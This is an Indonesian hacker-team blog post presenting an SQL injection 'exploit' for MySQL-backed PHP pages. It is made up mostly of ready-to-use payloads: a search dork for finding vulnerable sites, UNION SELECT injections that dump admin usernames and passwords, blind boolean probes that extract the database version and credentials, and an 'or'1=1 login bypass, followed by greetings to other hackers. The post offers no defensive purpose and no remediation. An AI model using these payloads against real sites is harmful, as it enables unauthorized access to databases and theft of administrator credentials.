r00t »» , »» Sql Injection Mysql

Sql Injection Mysql

by LOLids artich | | , | 0 komentar »


 
 
./Sql Injection Vulnerability
=======================================================
#######################################################
.:. Author         : LOL1ds 
.:. Team           : IndonesianHacker Team
.:. Home           : LOLids0nline[dot]blogspot[dot]com.
.:. Bug Type       : Sql Injection[Mysql]
.:. Dork           : home.php?id=[LOL]
####################################################### 
 
Sql Injection [MYSQL]
 
===[ Exploit ]===
 
[-]www.localhost.com/home.php?id=37[Sql Injection]
[-]www.localhost
.com/home.php?id=37/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,
group_concat(username,0x3a,password),7/**/from/**/admin
 
 
[-]www.localhost
.com/bar_detail.php?id=null[Sql Injection]
www.localhost
.com/bar_detail.php?id=null'/**/and/**/1=2/**/UNION/**/
SELECT/**/1,group_concat(username,0x3a,password)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
,24,25,26,27,28/**/from/**/admin-- -
 
 
[+]Sql Injection [Blind]
 
===[ Exploit ]===
 
[-]www.localhost
.com/propertydetails.php?Id=null[LOL]
 
[-]www.localhost
.com/propertydetails.php?Id=null+and+1=1   >>>  True
[-]www.localhost
.com/propertydetails.php?Id=null+and+1=2   >>>  False
 
[+]www.localhost
.com/propertydetails.php?Id=null+and+substring(@@version,1,1)=4 
 >>> True
[+]www.localhost
.com/propertydetails.php?Id=null+and+substring(@@version,1,1)=5 
>>> False
 
[+]www.localhost
.com/propertydetails.php?Id=null+and+(select substring(concat
(1,concat(name,0x3a,password)),1,1) from admin limit 0,1)=1
 
./Sql Injection [Auth Bypass]
 
===[ Exploit ]===
 
www.site.com/admin/
Username: 'or'1=1
Passowrd: 'or'1=1
:) 
http://server/admin/
 
./DEmo Site:
http://localhost/home.php?id=37/**/and/**/1=2/**/
union/**/select/**/1,2,3,4,5,group_concat%28username,0x3a,password%29,
7/**/from/**/admin

greetz : | kaMtiEz | Sudden_death | sik4mpret | Syst3m_RtO | iJoo | otong |
| FLYFF666 | james0baster | gr33nc0d3 | deHanz | Roby_cool |
| Chaer | Wahyu_devilzc0de | ELV1N4 | r3m1ck | vYc0d | CS-31 | Cah Surip | Bumble_be | bL4Ck_3n91n3 | SyNTaX ErRoR | MISTERFRIBO | Kimmonosz | Bocah|Dudul | tukulesto | petimati | bl4ck_sh4d0w | mydoms | Aa |Ch3rub1m | Bobyhikaru | kiLL3r_m4chine | YaDoY666 | demnas | rinowengi666 | ICH43 | and YOU !! |

 
credit: indonesianhackerteam.com
##################################################








Article information: Description: Sql Injection Mysql Rating: 4.5 - Reviewer: LOLids artich - ItemReviewed: Sql Injection Mysql


Related Tips, Tricks and Tutorials :



0 komentar Post :
Sql Injection Mysql


NOTE:
Follow me ON Facebook , Twitter or

Blog ini adalah Blog DoFollow dengan PageRank Free PageRank Checker, sobat akan mendapatkan Backlink untuk BLOG anda dengan berkomentar di Blog ini. Jangan ada komentar Spam, Please!!.

"Jika Menemukan LINK yg Tidak bisa di akses pada BLOG ini!, silahkan beritahu kepada kami melalui Komentar, Form, etc . sesegera mungkin kami akan memperbaikinya. Terimakasih"




Post a Comment

Next Prev Home